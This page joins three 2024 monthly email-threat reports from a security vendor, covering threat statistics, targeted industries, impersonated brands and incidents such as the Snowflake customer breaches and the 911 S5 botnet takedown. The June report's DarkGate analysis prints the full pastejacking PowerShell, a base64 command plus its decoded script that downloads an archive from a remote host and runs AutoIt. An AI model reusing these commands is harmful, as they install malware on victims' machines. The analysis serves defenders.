Monthly Threat Report July 2024: Snowflake(s) in July

Monthly Threat Report July 2024: Snowflake(s) in July

by | Jul 12, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of June 2024.

Executive Summary

  • The Hornetsecurity Monthly Threat Report format is changing. See section below executive summary for more details.
  • The amount of low-effort / high-volume email attacks increased for the month of June while other more targeted attacks decreased.
  • Malicious HTML files were the top-used file type for the deliver of malicious payloads throughout the month. This was partially driven by a new “Pastejacking” campaign we observed sometime in June.
  • The mining, entertainment, and manufacturing industries were the most targeted industries throughout the last month.
  • Brand impersonations for the month are down with the most impersonated brands for the month being FedEx, Facebook, and DHL.
  • The Cryptocurrency Wallet service MetaMask had a small campaign specifically targetting MetaMask users with brand impersonation attempts.
  • Customers of Cloud Data Storage provider Snowflake have actively been targeted by threat actors in a campaign that has breached an estimated 165 organizations. It appears that Snowflake itself has not been breached in these cases.
  • Change healthcare has finally announced news of what type of information was leaked as part of a significant ransomware attack earlier this year. The amount of leaked data is significant.
  • Kaspersky has been banned by US federal authorities from conducting business in the country. After July 20th 2024, the sale of Kaspersky software in the US is not allowed
  • The FBI has come into posession of a number of Lockbit decrypt keys. If your organization has been impacted by Lockbit and you’ve yet to gain access to your data, please see the below section on this topic.
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

An Update on This Report’s Format

If you’ve been a regular reader of this Monthly Threat Report you know that we commonly cover the changes in the email threat landscape. What we’ve identified over the last year of reporting on these statistics is that trends in email threats shift very subtlety unless there is a new emerging trend, vulnerability, attack-type, or threat-actor. With this in mind, we’ve decided to make a change to the way this report is formatted in the coming months as follows:

Statistical data points (email threat types, brand impersonations, threat file types, industry threat index) will be covered on a quarterly basis moving forward. Said statistical data will encompass the entire 3 months of a given fiscal quarter (Ex. Jan-Mar data will be presented in April). This means that statistical reports will be published in the months of:

  • April (Q1 – January to March)
  • July (Q2 – April to June)
  • October (Q3 – July to September)
  • January (Q4 – October to December)

NOTE: We also conduct an annual Hornetsecurity Cyber Security Report that does statistical analysis with annual data as opposed to Monthly/Quarterly.

With that all said, this month’s monthly threat report happens to fall on our Q2 data report date and will be the last report to feature the monthly statistical comparison that we’ve done to date. Moving forward reports that do not fall on one of the quarterly months listed above will instead feature:

  • Industry news commentary
  • Threat analysis
  • Industry predictions
  • Recommended actions with regards to security events or incidents
  • Emerging security technology guidance

We feel that this new format will bring readers the most value in this publication month-to-month.

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for June 2024 compared to May 2024.

Unwanted Emails By Category

During the June data period we observed a noted increase in the amount of low-effort email attacks as indicated by the 4.5 percentage point increase in “Rejected” emails. Other email threat types were down for the month. One possible reason for this is we’re now entering the summer months. Threat-actors know that there are fewer people in the office, and they themselves are likely looking to take some time away from “the office”. As such, an easy way to make up the difference in targeted attacks is to increase the overall volume of malicious email on the web.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.
Top File Types in Email Attacks

June saw an increase in the amount malicious HTML files being used in email attacks. HTML files, remaining at the top of the list have most recently been used in a new attack campaign utilizing “Pastejacking” which we reported on some weeks ago. In this attack a malicious HTML file is included in email and instructs the user that the “fix” for a perceived issue has been placed in their clipboard. The target is then instructed to open PowerShell (or similar) and paste the contents, ultimately leading to infection.

Most other threat filetypes saw a decrease when compared to previous months, with the exception of script files which saw a 1.8 percentage point increase.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index

Most targeted industries for the month included Mining, Entertainment, and Manufacturing. Nearly every industry vertical saw a decrease in attacks over this last month, with the exception of entertainment. It’s not difficult to see why. The entertainment space, which often includes online gambling, is ripe for scams and malicious actors. It’s an industry that we see often near the top of the list, and with the summer vacation months upon us, it’s a busy season for those organizations in the entertainment space.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.
Impersonated Brands

Brand impersonation attempts are down for the month of June. Nearly every brand in our top ten saw a decrease in impersonation activity with the exception of a small campaign that specifically targetted MetaMask users. MetaMask is a popular cryptocurrency wallet app. Threat actors will commonly impersonate these types of services in an attempt to gain access to the target’s wallet, and the cash contained therein.

Major Incidents and Industry Events

Data Breaches Impacting Snowflake Customers

Perhaps the largest news for the month of June was word of the multitude of attacks on Snowflake instances across the globe. Snowflake is an organization that offers data warehousing services along with data analysis and other cloud storage capabilities. Snowflake has many large customers that leverage its software, many of whom have been targeted in recent attacks – at least 165 to date (as of this writing).

With so many organizations affected, the logical conclusion is the question of whether the common vendor (Snowflake in this case) had been subject to a breach themselves. However, after an extensive investigation by Snowflake that included Mandiant, no vulnerability exists today in Snowflake systems. Instead, it appears that nearly every impacted organization was breached via stolen passwords which were then used to login to Snowflake Services. It’s also important to point out that according to Snowflake and Mandiant, the impacted Snowflake instances exhibited the following issues:

  • Snowflake Instances did not have multi-factor authentication configured
  • Credentials had not been rotated or updated
  • Network allow lists had not been defined to only allow traffic from trusted sources

In each case, threat-actors were able to exfiltrate sensitive data and the list of impacted businesses is growing. Some of the known impacted organizations include:

  • Santander
  • Ticketmaster
  • Advanced Auto Parts
  • Neiman Marcus Group
  • Pure Storage
  • LendingTree
  • Los Angeles Unified

Mandiant has released a Snowflake threat hunting guide for those that believe they’ve been impacted.

Update on Change Healthcare

As we’ve discussed in this report in previous months, Change Healthcare suffered a crippling ransomware attack earlier this year that impacted healthcare operations across the US. This prevented patients from receiving care in some cases, and even impacted medication refills, keeping people from critically needed medicine in some cases.

The human and health cost aside, what was not well known at the time, was the impact of data breach. That news came out in a recent announcement from the company. Impacted information potentially includes:

  • Names
  • Addresses
  • Dates of Birth
  • Phone Numbers
  • Email addresses
  • Social Security Numbers
  • Drivers License Numbers
  • Official Diagnoses
  • Medications
  • Test Results
  • Imaging
  • Treatment Plans
  • Insurance Info
  • Banking Info

The type of data involved is bad enough, but when you realize that Change Healthcare held the personal info on at least 1/3rd of US citizens, the scope of the breach becomes apparent VERY quickly.

Affected individuals will begin receiving notification of impact via mail in the coming weeks, according to the company.

Kaspersky Banned in the United States

Starting on July 20th 2024, Kaspersky Software is banned from conducting sales of its software within the United States. On top of that, Kaspersky is only allowed to provide updates to existing customers until September 29th 2024. This news is significant as it marks potentially the second time that a technology provider has been barred from doing business in the US. The other instance that comes to mind is the banning of Huawei back in 2022.

The FBI has Obtained Lockbit Decrypt Keys

A quick mention here – back in February the FBI, and international law enforcement agencies were successful in deeply crippling the Lockbit Ransomware operation. As part of that operation the FBI has gained access to a significant number of Lockbit decryption keys (7,000 approximately). If your organization has been impacted and you’re still working on getting access to your data. Please see the links listed above.

Predictions for the Coming Months

  • Sophisticated and targeted email attacks are likely to stay lower throughout the summer. During the summer months we typically see an increase in low effort and easily spotted email-based threats.
  • We’ll continue to see organizations (and individuals) impacted by the results of the ongoing attacks targeting Snowflake customers
  • Threat actors seem to be having some success with the pastejacking technique we linked in the report above. As such, it’s probable that we’ll continue to see the method used in attacks in the near term.

Monthly Recommendations

  • If you use Snowflake within your environment. Please take note of the guidance provided by Mandiant and make sure that you have MFA enabled within your environment.
  • During the upcoming summer months, make sure your team members clearly communicate any absences clearly. Threat actors will often try to initiate attacks when they know certain individuals are outside of their normal routine and will try to capitalize on vacations as such.
  • Educate your end users on the concept of PasteJacking. They should know to NOT blindly follow instructions from an online source, even if it looks legit.
  • If you use Kaspersky software products within your organization and you’re based in the United States – make a plan now to migrate to another provider for those services.
  • If you’re organization has been impacted by Lockbit and you’ve yet to gain access to your data, see the section above about how the FBI is now in possession of 7000 Lockbit Decryption keys.

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 120 countries through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.

Monthly Threat Report June 2024: New Threat Campaigns Involving Darkgate

Monthly Threat Report June 2024: New Threat Campaigns Involving Darkgate

by | Jun 7, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of May.

Executive Summary

  • Email-based threats increased over the past month, with most of the increase being attributed to an increase in easily detectable, low-effort spam messages.
  • Malicious file attachment use increased during this data period with archive files alone seeing a 13.2 percentage point increase in usage.
  • All business verticals saw an increase in targeting over the last month with the mining, entertainment, and media industries at the top of the list of most targeted verticals.
  • Fedex and Facebook saw large increases in brand impersonation attempts.
  • The team at Hornetsecurity has observed a new campaign distributing the Darkgate Malware using a technique known as pastejacking. This report contains a detailed deep-dive.
  • The 911 S5 Proxy Botnet was taken down by US Law enforcement and international partners. This is potentially the largest botnet takedown to date.
  • Threat actors are posing as helpful community members on Stackoverflow in an effort to get users to download malicious PyPI packages.
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for April 2024 compared to May 2024.

Unwanted Emails By Category

Our findings for this data period show that the overall volume of email-based threats increased over the last month. While there was a slight increase in the amount of emails categorized as “threats” and “AdvThreats” the largest increase, however, is seen in those emails that are categorized as “Rejected”. These are typically low effort email attacks that are easily detected as malicious as explained in the note below.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.

Top File Types in Email Attacks

There was a clear increase in the use of malicious attachments over the last month. Nearly every file type in our top track categories saw a significant increase in malicious use. Archive files saw a 13.2 percentage point increase over the previous month. Malicious HTML files increased by 6.5 percentage points, and surprisingly disk images, and .exes had notable increases as well. Threat actors are known to shift tactics regularly, so it’s not unusual to see a change in attack types (leveraging more file attachments in this case). As always we will continue to monitor this and call out any specific attack campaigns that are found to be driving these increases.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index

After we observed reductions in threats last month, we’ve seen the opposite during this data period. There has been a near universal increase in industry vertical targeting over the last month showing that attacks against all industries have increased. This aligns with our overall findings that the number of email-based threats has increased during the month of May. That said, the research and entertainment industries saw the largest increases with the mining, entertainment and media industries coming in at the top of this list. It’s clear in our data that while some verticals are targeted than more, the sad truth is it doesn’t matter what type of organization you are. If you have the ability to pay a ransom, you are a target.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

The most impersonated brand used in email-based attacks during the data period was clearly Fedex. This shipping brand saw a massive increase in impersonation attempts over the last month. Facebook also saw a significant increase in the amount of email threats impersonating it’s brand.

Recent Threat Findings from Hornetsecurity Regarding Darkgate Pastejacking

Introduction

Vade’s Threat Intelligence and Response Center – (now part of Hornetsecurity!) recently observed a number of malicious phishing campaigns distributing Darkgate using an unusual technique called Pastejacking. DarkGate is a sophisticated and evolving malware family primarily, first documented in 2018, and used for information stealing and remote access capabilities and known to employ advanced evasion techniques to avoid detection by antivirus software and other security measures.

NOTE: The below analysis contains many defanged URLs (hxxps instead of https). This is done to protect the reader from accidental clicks. It goes without saying that this documentation is provided for research purposes, and you should NOT attempt to utilize the below URLs in any way unless you’re a trained security professional. Hornetsecurity is not liable for any damage arising from the use of this information.

The Campaign

During May 27 and 28, a total of 105,640 phishing emails were sent from 17 actor controlled domains.

The emails contain brief sentences designed to create a sense of urgency or authority, urging the receiver to open the malicious attachment under the pretext of needing to review or complete a document. These sentences exhibit classic phishing techniques commonly used by threat actors.

A phishing email pretexting an unpaid bill

An HTML document named clarify_27-May\_{6 random digits}.html or Scanned_05_28-2024_\_{6 random digits}.html is attached. When opened, the page displays a fake Microsoft OneDrive folder with a loading circle, attempting to convince the victim that a PDF called “Reports.pdf” is opening.

A fake OneDrive folder loading circle

After 2 seconds, the loading GIF is hidden, and an error message appears stating that the document couldn’t be opened due to a connection error. According to the message, the DNS cache should be updated manually to fix this error.

A connection error requires the DNS cache to be updated

Due to an event listener on the document, when any part of the page is clicked outside the error box, an alert is shown with the message:

Failed to connect to the “OneDrive” cloud service.

The “Details” button redirects to the official Microsoft documentation on how to troubleshoot issues on DNS servers.

When the “How to fix” button is clicked, a new message appears.

A message explaining how to fix the DNS error

This message is prompting the victim to open a Windows terminal or PowerShell console and paste the clipboard content.

In the backend, when the button is clicked, the JJ JavaScript function is called which copies the web page’s title content, previously decoded by the atob function, to the clipboard thanks to the now-deprecated exeCommand(“copy”) method. This technique is referred as Pastejacking.

The title's content is decoded and copied to the clipboard

If an unsuspecting victim adheres to the instructions, the following commands are executed:

ipconfig /flushdns
$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo=";
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64)));
Set-Clipboard -Value " ";
exit;

The first command clears the DNS resolver cache, forcing the computer to discard any stored DNS entries and fetch new ones from the DNS server. This command doesn’t do anything malicious; it’s only here in an effort to trick the victim into thinking that the fake DNS problem is being resolved.

Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.

Finally, the clipboard is “cleaned” by setting its value to four spaces.

When decoded, the $base64 variable reveals a malicious PowerShell script:

$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Clear-Host;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);
Clear-Host;

When executed, this script downloads a ZIP document called 1.zip from a remote server, saves it in the c:folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs Autoit3.exe with script.a3x as an argument.

Finally, “The operation completed successfully, please reload the page” is displayed in a message box.

1.zip content

AutoIt3.exe is the executable for the AutoIt scripting language, which is designed for automating the Windows GUI and general scripting. As previously documented by researchers, DarkGate commonly uses AutoIt scripts as part of its initial infection routine.

The URL has activity attributed to the DarkGate malware
Read the full technical details HERE

Other Major Incidents and Industry Events

The bulk of our commentary this month focused on the Darkgate pastejacking findings. That said, there have been some other major items in the industry from the last month that are worth noting.

The 911 S5 Proxy Botnet Takedown

United States law enforcement officials along with international partners conducted one of the largest botnet takedowns on record. FBI Director Christopher Wray is quoted as saying:

Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet—likely the world’s largest botnet ever.

The botnet was known to encompass more than 19 million unique IP addresses and was distributed via a number of VPN applications including:

  • MaskVPN
  • DewVPN
  • PaladinVPN
  • ProxyGate
  • ShieldVPN
  • ShineVPN

While it’s well known that botnets are used for illegal activity, the 911 S5 botnet was used for some extremely bad stuff. The botnet is known to be used for a number of crimes including fraud, bomb threats, child exploitation, harassment, and others.

The botnet’s main operator was also arrested as part of the takedown as well, increasing the chances that the botnet will stay gone post-takedown.

“Helpful” Stackoverflow Users are Pointing People Towards Malicious Packages

Community assistance is one of the things that makes the tech industry so amazing. There is no shortage of people will to help with a technical issue, or provide advice. Sadly, threat actors know this is the case, and will always look to inject themselves into a conversation with the end goal of launching an attack.

There has been an ongoing effort with this style of attack happening on Stackoverflow recently. Threat actors are posing as “helpful” community users and guiding people to download and make use of malicious PyPI packages. The PyPI repository is an open source repo for packages people can use to help assist in their Python projects. The repo has been dealing with malicious packages for some time now, and it doesn’t look to be slowing down given the recent news.

It goes without saying, when you find what appears to be a fix, or helpful advice in online communities, verify and do a risk assessment of the proposed solution before implementation. 10 minutes of investigation prior to implementation can save your organization a whole load of trouble.

Monthly Recommendations

  • If your organization makes use of Fedex services regularly, train relevant staff on spotting the ever increasing amounts of Fedex brand impersonation emails. A trusted security awareness service can assist with this!
  • Read the details of the Darkgate attack methods we show above and adjust your security posture as needed. If you’re in need of powerful, next-gen email security software, we’ve got you covered.
  • If your organization is leveraging software from any online, public repository, take the time to review that repository and do a risk assessment. Threat-actors are increasingly using public software repos for malicious purposes.

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 120 countries through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.

Monthly Threat Report May 2024: Satya Nadella’s Statement on Security, and a New UK Law Impacting the Industry

Monthly Threat Report May 2024: Satya Nadella’s Statement on Security, and a New UK Law Impacting the Industry

by | May 14, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of April 2024.

Executive Summary

  • Overall, email threats are down for the month, shown by a 3.5% percentage point increase in the number of clean emails. Remember though, even though email threats are lower this month, threats remain, and businesses should remain vigilant.
  • PDFs were the most used file type for the delivery of malicious payloads in email attacks throughout the data period.
  • We noted an increase in the use of Malicious Excel documents.
  • The Mining, Media, and Hospitality industries were the top targeted verticals this month.
  • Most impersonated brands this month were Commerzbank, Fedex, DHL, and Facebook.
  • Microsoft’s CEO Satya Nadella has confirmed that the company will double down on security and focus on resolving security issues prior to working on new features.
  • The UK’s Product Security and Telecommunications Infrastructure Act (PSTI) sets new guidelines regarding passwords, security best practices and more for IOT and consumer home devices. Said guidelines apply to anyone in the tech supply chain in the UK.
  • Change Healthcare has confirmed that they did indeed pay a $22 Million USD ransom back in February
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for April 2024 compared to March 2024.

Unwanted Emails By Category

We observed a net-decrease in the amount of email-based threats overall throughout the data period with a 3.5% percentage-point increase in the amount of emails classified as “Clean”. That said we saw a very slight percentage-point increase in both the amount of “Spam” messages as well as those messages classified as “Threats”.

These findings can be attributed to the end of tax season in some countries, including the US. During such times, threat actors will make use of target’s expectation to tax communications in their emails. With most people having finished their taxes, threat actors will be moving onto other targets.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.
Top File Types in Email Attacks

The top file types used this month for the delivery of malicious payloads within email attacks are PDF, HTML, and Archive files. While PDF usage spiked by threat actors, the other 2 usual offenders saw a reduction.

Also worth noting is a noted increase in the use of malicious excel documents. We’ve seen a massive decrease in attacks incorporating malicious office documents since Microsoft’s decision to block Office macros by default. That said, threat actors have found ways around this via social engineering. For example, the threat actor may format the spreadsheet in such a way that it appears to contain a legit Excel notification message that instructs the user to move the excel doc to the office templates folder, or it will walk them through enabling macros. Either option will allow the execution of the file’s malicious contents.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percentage values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index

The Mining industry continues to top the list as the most targeted industry vertical for this month’s report. It’s worth noting that it’s common for some mining organizations to also conduct factory operations, so these organizations have to contend with not just mining-related difficulties, but the typical factory and manufacturing risk factors as well, so it’s not uncommon to see this vertical at, or near the top of the list.

The media industry continues to be targeted on a regular basis. These organizations are made popular targets for purposes of information gathering as well as for use in misinformation campaigns – a trend that we’re likely to see continue as we get closer to US elections.

Finally, the hospitality industry has moved up to third on our list of most targeted verticals. This can be attributed to the fact that we’re nearing vacation season for many countries, and threat-actors will look to capitalize on individuals making travel plans for the coming summer.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

Our impersonated brands data this month shows some interesting findings. To start, we observed a massive impersonation campaign targeting the German financial entity Commerzbank. This campaign saw a large volume of impersonation attempts and is the most impersonated brand this month by a large margin. Also highly impersonated were Fedex, DHL, and Facebook. These are all common brands that are well known by consumers and widely trusted – making them perfect for use in impersonation scams.

With the tax season nearing its end, many are finalizing tax paperwork and arranging financial transactions. As such, we noted an increase in the amount of DocuSign and Mastercard brand impersonations as well.

Major Incidents and Industry Events

Satya and Microsoft Double Down on Security

We’ve discussed many of Microsoft’s major security lapses extensively both in this monthly report and on The Security Swarm Podcast. One thing that has been missing amongst the litany of security issues Microsoft has been dealing with is a clear sign from CEO Satya Nadella that the security lapses are being taken seriously and that resolution is being driven by senior leadership within the company. Well, that is exactly the message communicated by Satya Nadella in a recent Microsoft earnings call. This high-profile announcement is the first step needed for Microsoft to begin to restore some of the trust lost from past cybersecurity incidents.

The announcement has likely been driven by the recent US Cyber Safety Review Board’s (CSRB) investigation into the Storm-0558 breach last year. We’ve covered the Storm-0558 breach extensively via podcast and it’s very difficult to find anything untrue in the CSRB’s scathing report regarding the situation. In short, the CSRB found that the breach was preventable, and should not have happened.

We’ll continue to post updates here and via the podcast as more is learned. Time will tell if Microsoft follows through with the claim.

The UK’s Product Security and Telecommunications Infrastructure Act (PSTI)

It’s rare that good news is seen in the cybersecurity industry, and there are many the new PSTI law in the UK as a good thing for the industry. The Product Security and Telecommunications Infrastructure Act (PSTI), is a new law that was recently enacted in the UK, that focuses on a number of key initiatives. While there are several controls and regulations put into place as part of this act, three of the most high-profile ones are listed below in an abridged format:

Passwords
Passwords must be unique per product; or capable of being defined by the user of the product.

Information on how to report security issues
The manufacturer must provide information on how to report to them security issues about their product. The manufacturer must also provide information on the timescales within which an acknowledgment of the receipt of the report and status updates until the resolution of the reported security issues can be expected by person making the report.

Information on minimum security update periods
Information on minimum security update periods must be published and made available to the consumer in a clear accessible and transparent manner. This must be the minimum length of time security updates will be provided along with an end date.

On the surface this appears to apply to only devices within the UK, but the bill states that the rules apply to anyone that is importing or selling applicable products within the UK. Failure to comply will cost offending organizations 10 million British Pounds or 4% of worldwide revenue (Highest of the two). So, not only does this law have far-reaching implications for the industry as a whole, it’s a law that has real teeth on it. It’s a sad fact that some vendors within the technology sector often drag their feet on following security best practices UNLESS made to do so by some outside force. This law does just that. It’s clear, we’re continuing to see the growing loss of patience of world governments where security breaches are concerned. This won’t be the last law of its kind we see.

The end results, however, will be a net positive. More secure devices – with more transparency for end customers. A win-win.

Change Healthcare Confirms Ransomware Payment

A short update on this particular point. In February, the Healthcare organization in the US known as Change Healthcare suffered a massive cyberattack that left the company crippled and unable to provide critical services to the US Healthcare industry. If you’d like more details on the attack, we discussed it in a recent episode of The Security Swarm Podcast We reported in previous monthly threat reports that it appeared that the change healthcare had paid the ransom. This was suspected as it was clear to blockchain experts that a large payment had been funneled through to known threat-actors.

Well, as of this month we have confirmation that Change Healthcare had indeed paid a $22 Million USD ransom to the threat actor group BlackCat. While it’s considered a bad practice to enable threat actor groups by paying up, this was far from a normal ransomware situation. Change Healthcare held a critical position in the US Healthcare industry, and with services down, clinics and pharmacies across the country were unable to process medical payments, issue prescription medication…and more. There was a very real and potentially dangerous human impact to this breach and is likely part of the reason for the staggering payment.

Predictions for the Coming Months

  • It’s possible we’ll see a slower release cadence from Microsoft in the coming months as the company moves its focus to security issues. Many will see a slower cadence as a good thing, and better security from the cloud provider is only a net-increase for the industry.
  • The UK’s PSTI Act may have taken device manufacturers by surprise. There was very little information in the news leading up to the law’s signing. In the short term we may see some organizations temporarily cease operations in the UK until they’re able to comply with the new guidelines. That said, any pause is likely to be short lived as most organizations will not want to leave the UK market to their competitors.
  • Email-based trends are likely to continue a slight downward trend as we head towards the summer months.

Expert Commentary from Hornetsecurity

We asked some of our internal experts about the news from this month. We have posted their responses below!

From Andy Syrewicze, Security Evangelist, on Good News in the Cybersecurity Space: So frequently we have to discuss bad news in this report, and that goes with the territory, right? It’s not very often that we’re able to share good news about the industry, and so I was happy to see the news about Microsoft’s new commitment to security as well as the new law from the UK regarding device security standards. Both are a net benefit for the industry and will make us all more secure. My only complaint is the fact that vendors often need to be forced in some way to do the right thing with regards to security best practices. Positive changes like those we saw this month help set the trend in the right direction and make me hopeful for the future.

From Umut Alemdar, Head of Security Lab, on Increasing Security Threats:

While April brought positive cybersecurity developments, including Microsoft’s commitments and the UK’s PSTI Act, the threat landscape remains volatile. News of state-sponsored espionage reached alarming heights, with targeted attacks against European politicians revealing widespread security vulnerabilities in political organizations.

Furthermore, threat actors are increasingly weaponizing advanced AI language models to generate convincingly deceptive phishing emails, imitating trusted individuals. This tactic demands heightened vigilance, looking beyond basic errors and scrutinizing unusual requests or changes in tone. The threat group “Kimsuky” exemplifies this trend, using AI to craft attacks and optimize malicious operations within compromised systems using troubleshooting prompts.

With the escalating level of cybersecurity threats, we must no longer consider continuous security awareness training and cutting-edge cybersecurity defense mechanisms optional luxuries but essential elements of organizational resilience and preparedness.

Monthly Recommendations from the Hornetsecurity Security Lab

  • Don’t be fooled by the slight decline in email-based threats. The rise of generative AI tools like ChatGPT has made crafting convincing and elusive phishing emails easier than ever. In our newly published eBook, “How to Spot Phishing in the Age of AI,” we provide crucial tips on how to protect yourself from such attacks and shed light on current threats.
  • With May 2nd being world password day, be sure to review your organizations password practices. Update policies with current recommendations and continue to communicate good password hygiene to end users.
  • If you have any IOT devices within your organization, now is a good time to verify that they aren’t using default password settings and that they are properly isolated from your core production environments.

About Hornetsecurity

